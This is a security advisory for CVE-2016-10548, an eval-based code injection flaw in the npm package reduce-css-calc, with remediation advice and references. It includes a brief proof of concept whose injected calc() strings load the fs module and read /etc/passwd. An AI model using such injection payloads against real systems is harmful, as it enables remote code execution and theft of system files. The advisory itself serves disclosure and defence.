CVE-2016-10548 — Arbitrary Code Injection in reduce-css-calc

Description

Affected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server. ## Proof of Concept ``` const reduceCSSCalc = require('reduce-css-calc'); console.log(reduceCSSCalc(`calc( (Buffer(10000)))`)); console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`)); console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`)); ``` ## Recommendation Update to version 1.2.5 or later.

How to fix CVE-2016-10548

To remediate CVE-2016-10548, upgrade the affected package to a fixed version below.

—upgrade to 1.2.5 or later

Is CVE-2016-10548 being exploited?

Low — EPSS is 0.4%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

from 0, < 1.2.5

References (4)

ADVISORYgithub.com/advisories/GHSA-4662-j96g-mv46
ADVISORYnvd.nist.gov/vuln/detail/CVE-2016-10548
WEBgist.github.com/ChALkeR/415a41b561ebea9b341efbb40b802fc9
WEBwww.npmjs.com/advisories/144